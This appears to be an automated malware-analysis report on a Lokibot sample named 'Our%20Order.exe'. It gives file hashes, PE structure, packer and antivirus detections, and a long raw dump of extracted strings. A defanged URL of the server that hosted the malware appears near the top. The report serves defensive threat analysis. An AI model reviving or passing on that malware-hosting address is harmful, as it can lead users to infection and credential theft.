MalScore
100/100
MalFamily
Lokibot

Our%20Order.exe

Is DLL Packer Anti Debug Anti VM Signed XOR AntiVirus 11/67 Related 2135
File details Download PDF Report
File type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
File size: 232.50 KB (238080 bytes)
Compile time: 2018-06-24 17:24:44
MD5: e35f3c5db0be3a9a274d5e4dae817dd7
SHA1: 907bceafb9a0c1b439ad7694916db7cb6148ca51
SHA256: 3fdbbfe0389de57ec483d9ffc44e316f2c4a7acd166fca7e848211c2c03f660b
Import hash: f34d5f2d4577ed6d9ceec516c1f5a744
Sections 3 .text .rsrc .reloc
Directories 3 import resource relocation
First submission: 2018-06-25 21:42:09
Last submission: 2018-06-25 21:42:09
Filename detected: - Our%20Order.exe (1)
URL file hosting
hXXp://abatii.web.id/apaci/Our%20Order.exeVirusTotal
Antivirus Report
Report Date Detection Ratio Permalink Update
2018-06-25 04:50:13 [11/67] VirusTotal
PE Sections 2 suspicious
Name VAddress VSize Size MD5 SHA1
.text 0x2000 0x13534 79360 564ee5ce905d0e83314c8f13d0e2b37f 98fab1c42dcf6b2c2d7be380d1611089cf4789b6
.rsrc 0x16000 0x26800 157696 3917e23c2e3a8616ddeb808be73b5cca 5cd0b49eaf8bde92359d536f461354f2411c23d9
.reloc 0x3e000 0xc 512 fbce0dc197dc58747d849400ea9e71b7 736973dc141c23db99c8c388ec00159d5efbdbba
PE Resources
Name Offset Size Language Sublanguage Data
RT_ICON 0x1a3d0 16936 LANG_NEUTRAL SUBLANG_NEUTRAL
RT_GROUP_ICON 0x1e5f8 20 LANG_NEUTRAL SUBLANG_NEUTRAL
RT_VERSION 0x1e60c 524 LANG_ENGLISH SUBLANG_ENGLISH_US
RT_HTML 0x1e818 122361 LANG_GERMAN SUBLANG_GERMAN
RT_MANIFEST 0x3c614 490 LANG_NEUTRAL SUBLANG_NEUTRAL
  • API Alert
  • Anti Debug
Meta Info
LegalCopyright: FC1gBi7e
InternalName: Zv9iDGTW
FileDescription: ifTmW0ei
Translation: 0x0409 0x04b0
OriginalFilename: rxEVuhhe.exe
ProductName: kMQFVh5w
XOR
No XOR informations found in this file.
Signature
This file isn't digitally signed
Packer(s)
Microsoft Visual C# / Basic .NET
Microsoft Visual Studio .NET
.NET executable
Microsoft Visual C# v7.0 / Basic .NET
File found
FIle type: Library
mscoree.dll
IP Found
No IP detected
URL(s)
file:///
Zv9iDGTW
ENMkUpvLkN6k2iwVib.jOQDBSblkHe1GjR31l
VarFileInfo
FileDescription
{11111-22222-20001-00001}
ifTmW0ei
rxEVuhhe.exe
Location
$this.TrayHeight
{11111-22222-50001-00000}
GetDelegateForFunctionPointer
{11111-22222-30001-00001}
{11111-22222-40001-00002}
kMQFVh5w
$this.DrawGrid
$#%#&#'#(#)#*#
StringFileInfo
Translation
ProductName
System.Core, Version=3.5.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089
InternalName
{11111-22222-20001-00002}
VS_VERSION_INFO
040904b0
file:///
$this.GridSize
$this.Locked
{11111-22222-30001-00002}
FC1gBi7e
$this.Localizable
{11111-22222-50001-00001}
OriginalFilename
$this.Icon
LegalCopyright
{11111-22222-50001-00002}
$this.SnapToGrid
{11111-22222-40001-00001}
System.Security.Cryptography.AesCryptoServiceProvider
$this.TrayLargeIcon
{11111-22222-10009-11112}
progressBar1.Locked
$this.Language
progressBar1.Modifiers
;tj
trWY
;}=<c
E-`pi
;dh(
gm7dxdO35LBk4kKthxK
8^?]
smethod_12
smethod_13
2 #,
smethod_11
SerializationEvents
2TZE
smethod_14
smethod_15
pidp
Q-w>5
'}-2]
VIJ%
Int32
B`=r
@Z
9:P*
ObjectHandle
A^1>
K Lh
]lh9
textInfo
ogFP
v ]+3S
2- ,
efc4wN907O4dWumnIL
_VpTH:
&*^ H
&+;&
[DbTD
'? 8>^
'`A-
GClass0
EscQiCvUuSVPLHwoADx
%H "
r J
E_VWM
?sOHZ
smethod_10
*^ 0
{rlj =
R|}mq
smethod_16
+>Q
]|]o
)ju+
smethod_17
\$HL
_5twpiG-
SLR%
u !v d
|: ot%
*;,n
pmh0LHZimXBinSdNeUf
`s4z
CryptoStream
2qNU
^p$k
KO9?
xXlS
\pRV
%_!=
ToolBarButton
?Uc8
smethod_0
smethod_1
smethod_2
smethod_3
smethod_4
smethod_5
smethod_6
smethod_7
smethod_8
smethod_9
CbHSRSviGYM9u1HEZv9
_DumzK
y/^\9
xC<w
Ir.~
PNG
h4=C
fL|[
To5-Q
%:5uor'u
Ctqv;
xek<UE
Y3<Ntu
1$HT
KRUsDmO8N7mjmQ63jZQ
Marshal
:8'
compilerParameters_0
yku
e'B#
k4^-
-BF!
fieldInfo_0
P\0o
fDN}
R]^^s
SystemThreading_SpinLockDebugView
=P8d
RuntimeFieldHandle
gBZ ~
d~)[
QFJ'\
cL6 OZ
.*Ho
y j_&=
zY0_|
$OpU
l@I/
BasicClient
#m)D
ATmSOtvoZGloVPGRIUA
p)cc@
(tJUQW
EndInvoke
PropertyItem
qTkI`
L*=
.IE_
u5|5j
FileMode
k>A|
YFa(f
aQ@H
r-#a
stringCollection_0
GF[
-U>
Pp90
$7Wv
ZjBxEAftu
.}M[
SWKxJdO76rfYPBxbipT
currencyDecimalSeparator
:7` k
5L#x
0'22
W7-!MD
~BSB
/vq=
^T.3
mY77)
Kdyrv0GUQHgQSk0ZR8
@{G6,
AssemblyCompanyAttribute
>5&*NDH
Se31ebOzvkrPcjGK7T8
Z27l
HL_j=;Ajij
Format
m_useUserOverride m_win32LangID
?6+sE
,0PL
JKF@
xllbiYOTg0MFCj8FKvK
jE$O
XuI(.s
VPBPX
5AHK-
k $MP
*(Jc
]f!r
ifMH
@fB W
uyff<
dqkc
_o?k
E:"
IcfRaQFwFU5mcU1my1
/NK_
n%f}
:L $
)T8}
~=U"
eZFYg
Bj3:p-
PADPADP
<}Yk
WZ=k
:eQ.
sortedList_0
aM {
n$ HA
^B.p
wB 2
|=&$
'1iTk
e)ob
-~+V
$}d#`#
FromBase64String
VMiumWZKQ0GeC5gdqj1
J<k: M
}$ !Rw
tGf4V
AssemblyTrademarkAttribute
set_IncludeDebugInformation
m_listSeparator m_isReadOnly m_cultureName
YF(^a_
o+nd
ftAH
Uw6qA!
e=}^
_ x
R-_j
+dq(
%*esA2
So !
w^)ye}
tfr,j
Mpe5
9=C/)t;z
"B{gQt
V9~1
w@4
#Blob
X#H?
ne z
M`y,
<s ?
T$&J7
Jq65qlZJXb1j7Qr8ksg
VC6-
.G#s
y(Ed:
UT8G1M33ui7ev
$829`9U
JVQ8h2vuGAUDOUeSyok
l5%.
>nBt<
B_ 8:
W,\)
lw:~
pBr&
ConnectionGroup
bxIx,\
Type
R"8IoGaT
Xk;V
wLHx
_V`ln
-?Wd
p"}t
Ejl >
]7<f
kruR3
.UNG
_^RT
`LpZ
yjHrDlZ3vb3NYrM3Fnj
l88c##
-T8b/
ceJjVCOPtJvFIp2Ui9y
2itfO=
t x
,WE
XgK G
X="
+!#
<vpcY
MBErrors
$$method0x6000007-1
DN]3
8`q>#
E?O3
adz LhfO
H6r^
numberNegativePattern
jx:*
s\aGc
jB\ft
H*3o
}`!'Em
!r&W
DaTbbtZsfCXfrOq6fo4
+e(F
XYPdxMruPJ2VlrFrHJ
b?(;
_;fo
]\ nscb
<ReadAsync>d__145
OdbcRowUpdatedEventHandler
ushort_0
HashAlgorithm
V"mnk2
wHfOJ7fOgCYs41pHr5
K%|
9"MxA
ConfigurationSettings
Taskbar
0k$w
ListView
O.8 _0;
+LA0
ResolveType
(%
GfG3CtZNFPN2NXSxkkm
&*2(X
MZ}
y/x
t8OF4KZ1300ecpcIMC
@X4Sv
opOF4
D^W@H
|=]|pqB0
!1c)
:UQJ
F)dC
c5v9sZOymRDMhtM9c06
RR 6B
8(BE
@b-,
RS ?
wV:9
qEW,
zSdg
.text
|d-2
ce4DmfsmSrOT856tDgfrkMb
GetString
9%"|@
>3we
uv a
O~<~
28G!c
R!r_
Jd~A.p
Convert
Z:n(Nl
+!&+ #
positiveInfinitySymbol
)s's
object
56 B>?f
=vL&
f16G;
FlushFinalBlock
numInfo dateTimeInfo
d\,g)
'5Um
0c:z
StreamingContext
E4ic%
5JGW_
L0B<~
0u=o
FlagsAttribute
rA7}
|++!z
$$method0x600005f-1
$$method0x6000020-1
CMPrbSrAyBNsug8I0b
$$method0x6000020-2
CTfxAGAQC1V0BRc2J9
:ZVQ*
.=c=
EQe)8
?6|[
encoding_0
jsl+
Aq#6
26OY
skZ9L3O4YfkKJes8Oq4
7K<jI@K
F <+S~'
*dCt
z-
QYE,
Qe_7:
jy\nu\uGC
CipherMode
quB
S 6Yj
B3'+
?pnm
>03l
EhavB]K
0(dX9
q'
\xku
?,,,
NP9A
-7])6S
+6["AW
OVtY
TypeLibVarFlags
Y4vf{C
System.Globalization.Calendar
fR{D
JcRB
`.rsrc
}:Jq
|- w
*'d
u EH
=V1J
Eaoq *1&H
!]O&
S9 v
*2(c
t*v){
IconData
|_Ip
5#H#
3Ng5
w ];
%QA{
*2(l
result
!Kdly
$_`v
R+,/
=Cm4r
l1-\z
<>c__DisplayClass172_0
:VM*m
kpHY7
get_CodeBase
5B}B"(
Utilities
*2(L
-Infinity
v ~W{
tb.uaRCY
-9|
Qw$[,
3gno=
bL*^F0~4]
d< p?|
;@n
,7L7%
*2(0
1 A
_1)Y
}D5b
zBEFnjuu2MaeeyYmxi
D{<#
{p\C2
J@Ev
Y/pst(\@
"[((
hC9c
xoYgoGOow5lMB8xr4Jg
+kM]
})WaZFv
7C0H
eL}SC
kr*
height
D!dM1
W{.q0
Prd!
<6}"
-8o]
delegate1_0
delegate1_1
StringCollection
O_Lk
y$GX
-ur
culture m_SortVersion
+GV2N
9=9`
w:kO
i235ncOCJbMlBf1AZS4
,36
EkpHDB
J+*b
vLF"m
3n5J
>g5b
[KD_
lhY.d
rk
$O@2
t[}+r
G K Y`G
!J,'v
biUV
GetBytes
TargetFrameworkAttribute
ToolStripDropTargetManager
~_@l
7LnK
ReadAllBytes
9A9)F$
9j~HE[
Enum0
(1XrLJ
d UZ
,`RC
lL32TeOeKAK6IFAXMLI
+&&+
< H,K
g8kBbYVHMjINy0qRad
Write
,+E
uSGwCYZGjxL3tXl7uAe
& nl
zj`[
s0TnVsZDcba2MDVlSaC
nativeSizeOfCode
get_Assembly
^i HD
sR[D
]<}|-
j}^vm
$O0|
MB@Q?1
R;:+
St!b
- sI
JW<E_
ci9/
bK'/
*2(%
)P3S
O(wk
I"x)
/.1
Bjm#
*2(>
8d4+
+R~1
\VTP
*^ T
System.IO
WrapNonExceptionThrows
:SzR
System.Globalization.TextInfo%System.Globalization.NumberFormatInfo'System.Globalization.DateTimeFormatInfo
numberDecimalDigits
B3Y
=wKR
MAErZxLoEbXH7n9OQQ
j2IBX3O9lki1iDJ7MLR
X|NL
Z(YE
> )o
v(dA10
Console
}H4X
wL$S
System.Globalization.SortVersion
B3'#
'_RQ
ZV*v
Si_R
1 E;
percentNegativePattern
w?zHe
-<&
fEZSQOalnKhG40476s
@)Z
yXe^
<C#K
@ynC
+ h.
int_6
C:Y=

0A]s
}H4a
H8cvXV
tb2\
%q0;
X9_
vvS?
gv4y
:S>h
_8AC
IHDR
System.Runtime.Versioning
:4%<(
40^bf;
jCEKM
DIiKrbbmfBqO
`Ccy
7^lqL L8
^k{-
IconSize
Ip t
#t&x
jNh\
qii
mt>JL
NetFX35SP1SKU
XNexwYZfNttqcl2pWxS
2Uk]
]%tX
R>cp
DKV.
U6Bvi1ZZsYYYHevqfxe
I68Ip
System
WyKHSrO1Kq6Vg84we92
Tzdp
Microsoft.CSharp
x,3\z
System.Drawing.Icon
@w#u
3sOp
VfT\
kUVC
BOBSSg69ubdY9spVJi
tj0
3s[`
Class8`1
61RP<
CreateInstance
~u"d
$$method0x6000039-1
Ib2Z
FieldInfo
gF&P[
JLVy
MethodBase
#Strings
QrFc=V
`XD`O
System.Collections
j ]9
/=Ov
|7&;
set_UseMachineKeyStore
5fHT
R 4+$
L r= cP
ENCMetaData
z/1o
dn#k
E3z?3
U `r
`qsF
&+w
memoryStream_0
StandardEventOpcode
aN/+
N2=Gnl
0MWL}
currencyPositivePattern
!>[B
8C{BZ
ScBE
c S$Gk
.jjk
digitSubstitution isReadOnly
TG&l
Qc p>
width
>x ;j
:#GW
,g&
K<Y<B
get_EntryPoint
pc}T
~s36
GDWh
Lpse
Ohxn
T%R\
*J?qT
#2`O
~w^6
~OekQ
,'+^
string_0
UcC$
System.Diagnostics
IntNativeMethods
GetType
l[uP
M 4-u% j\
4k'p
{"umi
XT*F
PNr%
kF[zH
1j##
ap:\;
D ~jJ
X9tD1YIPCYJPWlPeGq
3:%w
c:}
CK`H$
BChi
Module
j mh"
lEiwfEm05DVL028im9
Activator
bo`Q<
MJ2@
Zi>9
(@!db
,NE
J{r
mMMKE5ZS2yJO6Xnp9RH
COMException
$A2ng
T/6A
0 On2@{5i
ovbuehZ0IHdaAwgPvwd
D"@)
(B\(Ww
Xn.pe
cG + &+
q~)0
:&%L
V|C.
|PTn
zhrFniO6JX9vpMEFiHJ
method_10
Double
$sI[z
}xj7rt
v%k,
O`d^
E1o
CompilerResults
2:e>
":4>P
_vbzb
F)KO
MIbdhSOba8Cc7PrQuIb
NgXQf
)I&6P+
+J 2:
MD5CryptoServiceProvider
xw1IpYZqHgtTFaldO2c
Jn]Z
get_BaseStream
|F 0
:zj[
:]Qv
{q!c
F]]MU
Z 2e>
get_UTF8
QSFIPkOGFE4OrOhwdJB
2D'TTWn
l(N[
TrWfJeUg3AMDAJTymK
Hs0Vj5vtBisuCHInAf0
*2(
&q7 O
*n2(
j)c'Q
P+Class7+Attribute0+Class8`1[System.Object][]
tP|FV
zB<kU-
AssemblyKeyNameAttribute
=R9 +
l AN&)t
0T-N
RequestState
~JyJ
'fKiYp!Y
8PQb
`M}9
]Q!t{<
WXTZ
([$;
get_ManifestModule
78V&Z
{4S`y
;1g
wf0koxZPynwFStOYq24
m d]
x6kBd5Ox209kPKotuTp
"3`)
Z1@wt
H`!t=
3db
BitConverter
NU4aW67LbTJKgf5wy5
?K!^X(
>u
i7W3jsZOKHUh47frGTA
sEl~-v
vT2
JV2|
3THL
V~ e
-k&+)#
(.9(_
Jr+Z
m_useUserOverride
3 :UJ
NbT{
QIQ
8 ='
0E?!
6Ok~
hvF]f
,;y'
BvDD{Wx
System.Core
C(T+0
agPZ
E VJ
{Wv
5B *
~}#
~>|]
2PH%{L.
Delegate
AssemblyName
~BT
lWe
NKGK
&|rV
toWH
b7MV
,[7S
Func`9ConcatQueryOperatorResults
%"Mix^uL
e$O@f
get_Unicode
9s*Z
A{Fw
R\V@,
2&" .
J@{%
*fSC
1*=@
C3PlW
&*b(
bHiZcYZpg5X92jDibXu
quB88QZdJaNltHUWOpu
:N[-
QsoT5lO0C0CoqlonSj8
^2\2
(yxk
JJXqM
"4F1
0501
HCSxkybdtWhoPLh1j3
Enum
JoJ7Vit
^I%i
3<(,
assemblyName_0
h0/^
B#z;
$?cN
6QWO-BNI
z )
m`)|j
oopehIZQZMXDvi7ZyE5
"fCQ
Y9)d
;D e
,QE
get_Length
0L cZ
perMilleSymbol nativeDigits m_dataItem
J<DNZ
QeWaOqOh41XEQYa4yxR
-1&#
)-PYd
h^e~B
"Wg (
Ae34
Dpv
T0G/As
-{&+l#
object_1
R;4?S
+@ ,
bS2J
=$Xm
!zk30
pIFnNZv82ZaBDBNkDd5
#-JA
x@s}
DoTr2b1UKeSFAle8tC
G /z g\9Mo
tEeo1
ReadLine
CompileAssemblyFromSource
&+E&+H
XQ4"k@
f_`X
ValueType
))w,
OW7b
System.CodeDom.Compiler
Ma2~x
hI8PB
A# 4;dC
Q:p-{
[+2+
4Xz<b
Y;9A
ToLower
[Jk,
Tanh
UJ8a2
&*F
System.Runtime.CompilerServices
i+<ee
J9=WL
Trim
FcWyUOvaSdN2sKPv9vR
validForParseAsCurrency
cC'$
System.Runtime.Remoting
9[jBq
F+"-
'Rc
ac'JB
f[2a
za5329Z5v3bBpm6f6ph
o;B{V
bmoo
0&Xc
J\az
XY.>
"~bOMLmmJf
%6u$
r 9)
HgPU
OCTgmqOMngcLLbcMoo3
~S
zZuf
<A<6
[(L+
lR3ZxgZoB493ScMt8ZV
}-r@y
3 L3
D '1
M*XK
5Rgf
9s M@
=Jaq
z,usC
1^A,;V
2N@ B
UInt32
ToInt32
dt:S
Z1"<!
BMtuS
assembly_1
assembly_0
b=v=
_B-4:T
ToString
oQS10
/OJS9ij
=r@EDU
18Y7(d
IDAT
ConfiguredTaskAwaiter
Environment
2-d
mCC+
zC\r
2' !

zx"I
@Z 8
array_0
Xp5%
*vf
MfoSossRjIav2OLZTU
|D3/
0+6_
Jc-Q^
vN[P
#kYi?[<
fNO~
D2!Z
FOHBelR2F72DCO4TlG
lKtG1M3zKMrsE
jGibPtNqYMIt
t/Q p
3:,
;~A
jn/SG
r,*n
Unwrap
XapM
(kh c
S 8E
T7?prf\
"Z|m
rU%x@h
*F <
ICryptoTransform
GC718SOwhk2Tv0Wdjhr
U3160EQRNs2MokYM76
hMeD;
W;/p
Tnb=
yR<G
d>Ah
1N-`
args
AssemblyTitleAttribute
exRDbhvveJYmifoe6gQ
AssemblyDelaySignAttribute
ewU1Z5ZwohZKYb6PilN
fjt,
cbij
e`QR
+/kD
Kr1eq1NuA79KfdboZF
M/6b
IL[0
y a:
;~<
^7L)`X
System.Security.Cryptography
] -
q+!v
a0-;
MemberInfo
U To
nGLxIEZR5bNdl85S64b
SoapNonPositiveInteger
+M?Ew
I"@ 6#r~
yUEd3VupE1toR5aQvD
B$IP
% 5%
jr26n
a3
=d:Tw
~X~`
#K'j
`jh uO
PhMwW2YjqIiujv57Ud
IDATx^
K8 s2
I;*Q\
Rl<d
?,}&[
32 ,\c
8D :.
?MbY
%Y>>=
qgLIeFOqEHXKKJRBAK1
3 m M
M wu$h
$^aq
C \
ToBase64String
currencySymbol
=|e~Fo
numberGroupSizes
o5nR
^B
k0^
! esjU;
numberDecimalSeparator
uAe8ZfSQiQtGe36idi
rKH0m
pHYs
.ctor
StorageFlags
hnaRXwHPxTqc0FMUtH
`#J1
x9jJ33hdINpfuLOWrN
X }
mscoree.dll
<?xml version="1.0" encoding="UTF-8" standalone="yes"?> <assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"> <assemblyIdentity version="1.0.0.0" name="MyApplication.app"/> <trustInfo xmlns="urn:schemas-microsoft-com:asm.v2"> <security> <requestedPrivileges xmlns="urn:schemas-microsoft-com:asm.v3"> <requestedExecutionLevel level="asInvoker" uiAccess="false"/> </requestedPrivileges> </security> </trustInfo> </assembly> PA
sdyt
*j(?
4[O~<<
A*0
BQ c
xA &w
&+/E
X i
Main
;+ P
>\)7
Invoke
ORtaL
u!#'
LE Q
method_2
method_3
method_0
method_1
method_6
method_7
method_4
method_5
-/E
method_8
method_9
wJQ6r
AaQPe7OBCb8XXDjIahO
- &
v4.0.30319
7L b
X 7
v1^A
X 4
tV &,X
goycXPmPW2bacXsl7r
/C?5
ep5xwu
/ -"
tD83BYZUuMiOG2k0VMB
dKY
[t|t%]
C@qd
+1 oGL
-z h>
Delegate2
Delegate0
Delegate1
FileSystemEnumerableHelpers
^ `}
FrameworkDisplayName
Array
x9 %2~q_
yq0qKnwZXDcRbddgSR
8"4@Vh
bCz}6i
aR3nbf8dQp2feLmk31.lSfgApatkdxsVcGcrktoFd.resources
intptr_2
intptr_3
intptr_0
intptr_1
paMW
(Y\*o4
@.reloc
, &#
DLjb
uFPL
fY }
Z8fQ
9- Q
g4bx
i=kK
dXDk
;D2v
C(R<
6MYb
Y \/
b[\7
^S D
dMZ3Y2a[
Byte
gEmG1M3QXLMBw
a##c[
CryptoStreamMode
currencyNegativePattern
UV2PyoygTf55nsjvGp
get_MetadataToken
*^ ~k
:D M
R~/6
Ji h
B .,
C;6i:
GKTnoTZEnO2dJHxjjrU
attribute_0
2h>E9
DZwjQ9ZufxmUtVMuoSK
XxJvnfpD5KUtedBxae
uQ~F
U$$[v
&+D&
4SiM
_~rX
IGmuQKGRwDvPWacUZ0
compilerResults_0
Qixu
tundgCvLaL2SouiiF5j
NetworkAddressChangePolled
; )4w
_<(:
numberGroupSeparator
R~kYg
AU[SV
R@7iF.
|x j
get_Location
} EI
\,i(
I.}S
;/8Q
Nug^
nVM1yrIxsWJcaDGZ.g.resources
VcLp
&I#N
BLqH
}DCH
0UA-
*u;N
CdBM
'Xh(
comp
5 IR
;O+;
&YUO]1":
"#WC
D 9P
wa'}
fyn{
L!go
4[*'^
B3$#
HONYgH3VVHLLZpGhi7
6U*d=
Gm9tw
DebugXmlSchemaComplexContent
OYBbJ2WO0bffoDTlIk
z`SC
(3|
get_CompiledAssembly
DisablePrivateReflectionAttribute
&+/&+l
Z``/
System.CodeDom.MemberAttributes
B?8|
K[ i
WuC:
FileStream
*CEQ
e~ u
\
"JdV
RuntimeCompatibilityAttribute
UK;b
Y*ijM
&
f`aX
-6+4
= 8p
u g~JO
NY.<
PJ0A
Assembly
=W2T
$O@Hm
m8"H\0%
<1*+c
9c ,
HLf'
T >y>Z
oFEEMGeiIVCFJkJeh1
5vfl_x3V
8'
{UFG
\}&
vQJ@
mw9@
Y aQ
%veJ
a^`s
EJ@n
KwhF%
System.Drawing.Size
& P
*[C%+
,X&+<
" b
w#%;
ExpressionVisitor
V{so
Sbq7LEZ8sSwU6YsTlYR
,SNkuo
s3I
-A+j(
& l
lSystem.Resources.ResourceReader, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089#System.Resources.RuntimeResourceSet
|$4>
4/y*2
set_GenerateExecutable
ASWntP
nG(V
Y -
OTt 0
I*EmM
Y *
tSKuX
$y. d
5]c|
,DE
6^#fv o
Y ?
e9>}
&5)$
AvaLk8vEUD3ftvUm5Q8
%UE1B
lF}(
yeqZosxGlLJyo96ENQ
)/9vH
nSL6
&*w
tre<| Z
crj
*ms-
/ >W
m_name win32LCID
T+e^1Y
Y n
vw7jR
?o?^Y
ExpressionIterator
H#h S
w o:z
d|T}Ne Cvk
iMoz
XUgO
}o$]
g[hD
'[ v
&3_x
&+4&+<(;
^6^`
H2j4wxFNEYNAWDyU01
wqEtmLZeAKBX5u3eUKh
h*F#
b4b%5
\C!T
QXPloM5eLUmAcJ6Wdp
[ Oo
X t
*It![B
62$?
]WOZ(
M[+5
0&q
X {
e\4
OT*Hu
(;B7
M\X(/
;%OH
X a
qEK4nr86JiOjYxL5yj
k*<7
hashtable_0
CallInfo
X k
X h
R$/P
tkOiDbZhcKWPyDjJUNK
c<;,
X ^
(yy|Y
eJeWZOZ7Sy0dS8AB0qU
RYmUt6OlMTgnNxO5PsR
3]Sl
XE&pF!
i F:
2R=*
& Nk
m~k
vne.
5r\=K
X :
@ :j
BS3cp$(
<_lL
cr<N
WQSX
!QFl
X !
-a&
bF9V
get_ReferencedAssemblies
XSlc
-KSB
EM3r
zAh@
]xx6
QOw#
57Lb
W\>g|
ansZmYZyvDU2TOtxWcu
{P~a
k6oKL
PropertyInfo
^0H2
W~0}
/;q
50Us
usIp
Sgfr
)PVe`
!"S'8v
Ue6G7uOphX3Jt1ppmdE
<he@1
HostType
Dyf`
XkWU0COE7vpWDJv54lh
M /x
m_useUserOverride m_isInvariant
Bkto9
X|!v
Hb~<kfBdu
aKVuN=
!zQ8H\
K*i;
Oh_]
nchwqso4BoMsbseLrS
xqy{Na;C
-<g<On!
SystemThreadingCollection_IProducerConsumerCollectionDebugView`1
method_11
0Q'=
}aiE
EjX%
-9pje+
+=#
-o8
CodeDomProvider
ReadBytes
ViU9Eo2D8itLH3hkCT
o,1 <)3Y
Kc
4*<x
lE{J
UV5iwHv76oLQL57IvP0
cryptoStream_0
AssemblyCopyrightAttribute
;t'D
WS0-
m29
xlPZ w
afgyt3NAkq4uNGtF1J
mZei1
classthis
wP5dCCOiacoY2dRh5P0
vY76DbZL4mV6M9ZY4sV
aU95}$S
,[&
Xdowv
x7:f
bi9!
jvdQmhZg9xduPBOP2dS
[l
+)HFY
Infinity
YnWD
C65L20OtHlTQbYIf72W
Nw t
0_8P
Dwh>
GjY$(
Mna]
_2N#7'
J*X4
|6zpt
du*k
%!Lv
[>r|
FileShare
hCJ}
:T:9n)
r~0p3
%=ZV|
J0oq07Zjivk8wb9BGh0
1Ew
<PrivateImplementationDetails>{DDEF3C00-3864-4846-B5A5-4CCC0C5086EF}
CollectionConverter
D`I_1
<Module>
c5"y
PreviewKeyDownEventHandler
Q>fn%
+ S
iK7[
C>(R
jV3vVNveb0XucSkSVdJ
8/>}
Close
1IVn
currencyGroupSeparator
=76^3
1^ /`
Bfkbh1OAv4AYUEAO5Su
&+(&
Mg6%^K
gOLNevOSV3i0738JnaK
ECSU`]
.NETFramework,Version=v4.0
Q82tWY
H{ }
OW2Xo}
n.9 G
kY`#
<3$5
9McR
Read
`3$O
'1>9
#T0}
{<|:
)V5emh
&?GW
YK/~
~tIJX
YleMH
cS\i
es
value__
!v4#
b*HMuK
./ M2S
(J.`
~kL4
K0]D
n>9Uy
tw?&
6[4C
VMKm
_I6H
K (
XA/x
,rx+
mb/\2
eXjyMGXyjRWPJTsEWg
>8L1
'sZn
gAMA
`gk W,
jP` $
WF D
Sb`T
~'v#
wc R
Y ,
!xOt
Xo9l
1g>l
#|}H?
jCs
U;DN
rb whjO
_36Rc
Ze5
Y ;
Oj"H`
fk~x
.cctor
AsyncCallback
SortedList
<Lf53
}CX'
mscorlib
|5=&c
KA((
>aa!
dcs(
Q1I77ZOOytBD6fMnceQ
h'DsI
l YeN
j4&S4
xT9~4`
Za[u
99A%
5}62
hLL[KR?^
Y l
AMD,{
GetMethod
)P*6x2
Y q
tbIGf2OfHStE4ZcjiAD
Y ~
: 5_
EventProviderTraceListener
H:=K
H7Z)
k.7zS
:4 #
Y J
+B=(
$q6?9
p57~
dM z
RSACryptoServiceProvider
W!{:+ j
f-p"
EZ5eFPOU60KdFSQU7NS
krpWjnvCBEgmF25NiZG
b9r"D
d+uZi
o$
r|7Ws
iT.^16L
dG/+0
cT"G>|
<OF:
NM-:q
System.Reflection
fMZvHm
(2<
+}*s
DY?lI
A.w&
RuntimeTypeHandle
m+tn
lL1WYz<
method
h4a=f
fGAWa
]d&q
!z$q
O(r&
MergeFailedEventHandler
4x9"
,GY/
Ev!HXT
0A)l
wF"B
zBo2hHO2N6VHAndojXi
cI8clk
~8"D
Dts'
jDMgIjZ6KibLTPevJDr
O|`& B
34G>
)P:]O@(Q"
RXHYymD0MkUdGjUwbB
py?{j*
%uQs
9vZ'S
gosu
&+2&
int_5
int_4
int_3
int_2
int_1
int_0
luS0q2Xgg6uD4YLmVR
Hg0{
S!3!
mkO:
"h2TI
7*TGO|
7_@S
ua*
'O]B
I9;r
xcc'
UT^1i
Zx)"
J2ju
<Rw<
string_2
+%sE
string_1
)1`R<
AssemblyDescriptionAttribute
eM-.
|VRR
f(O&&
G' G
`^tAi f
,R yn
FhvY
@%S
SO3yMLOF3QPqmK0WTAD
\ l1
zJ K
=_f/D
un?a
'LK@
%E fht
[.uZ4v
M:]f
Z|VCM$
byte_4
]gQt
*a!D
rgpZ
Y{'\o
Wc%<
g vn1:b
t-YM
Q4y
percentDecimalSeparator
g>(KBHM
4#C/
type_0
SQL_DESC
E)aj
ISystem, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089
yhPU
U+M-
RcL
_amn
CXPN
LV$6
DS
&]%<
=#:$
dUrwN
OmhM
F@yVB^
v~mB
&+C&
&*2(&
I^l A<
1r[,
4J[MS
?@@s=~
*~(0
g.ua,
.xt
?JK^
_Y >rq
exTb
$$'`
@H@P
&AXHCb.
Ce.JFkM{!
Tl aV
A(MD
:OjzC
&*2(|
IDH$3
0Nh9`
F'N]
get_Message
!This program cannot be run in DOS mode. $
;T5
:uz+
bNL(
callback
wM*
p [G <
File
`-Z
BF,}
:72k
Dispose
G2gcu
nT?z
8Yl!U
s7O
(nL3
=>QD
N{!m
5!J?m
s5 5
LqH8
Z1|6n'
=e8H Kf
\<g6
eml5Eni08WUV19tRb5
XF"BB
4`x
set_GenerateInMemory
0|Rfhn M
[ l
o\ ?
R RO
w"Rmj
?;dL\n{A5
X42
VID:
$$method0x600027b-1
VChQBaOuJjbDkca6hLM
G?!
qHBB"
&cmLyAMCb
sh0\K"
GetValue
9"3!
omw%
m_d&
6`{O
<W49
L-HZ
`gBSO'7
5sXK0
MethodNames
J>QDuPEJ2
P4Zc#s
HDX#
q8d/
E a}
X #
/Zr/
=^=&
}KRg
y*M!
;$qx
#0A4#
BSJB
wMaQ
{|UDv
X_[g4
${IF
1MaR
*HU
BSGwE
D5!)
OX,d
op_Inequality
JpNWIuOIg4rHGLlL0PL
^R"U
N w
GetManifestResourceStream
sGy.
J/o^gH
3 )n
7"G(W
Pg|^P
\]M
EV9p
{Js
/KtY
XD-O
2yqshx?
h=2e
]6gP
a)VA
%w-u
CreateDelegate
IntPtr
BvG:
bJzY
J<_7]_
uA(@
vliarM5krQIJ811vKs
)_+#
$>_L
Hw{R
goa"
IU_X,
ResolveMethod
u:VO+
IViewObject2
,__x
System.Collections.Specialized
16vMt~
PHz=zX9m$
Swh'6
(&/H
P, gA
7ay5
\`Bgz
7-5Z
um RR
- +3
#HC !
J|E+
`b|
;4qV
}+h
=&n}
#@(v"b
OJ%_H
d{{a
Kh8):
mY8"
$3_@
dowa7PZnlB0RkWwUGsJ
+TC`
afyvuUwUA
RijndaelManaged
1FE~
6mKc
TV J
P2N v
^7/c
Rn(V
j7Q!
T~[5
*XG&^
n`ZVC
E*r9
& Zk
RQv
